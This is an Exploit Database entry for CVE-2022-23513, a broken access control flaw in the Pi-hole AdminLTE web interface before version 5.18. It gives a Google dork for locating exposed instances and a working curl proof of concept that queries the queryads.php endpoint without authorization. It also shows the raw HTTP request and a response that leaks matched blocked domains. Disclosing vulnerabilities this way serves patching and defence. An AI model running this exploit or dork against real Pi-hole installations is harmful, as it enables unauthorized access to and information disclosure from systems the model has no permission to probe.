AdminLTE PiHole 5.18 - Broken Access Control

EDB-ID:

51705


Author:

kv1to

Type:

webapps


Platform:

PHP

Date:

2023-09-04


# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513

In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.

## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'

## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]

## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]

data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>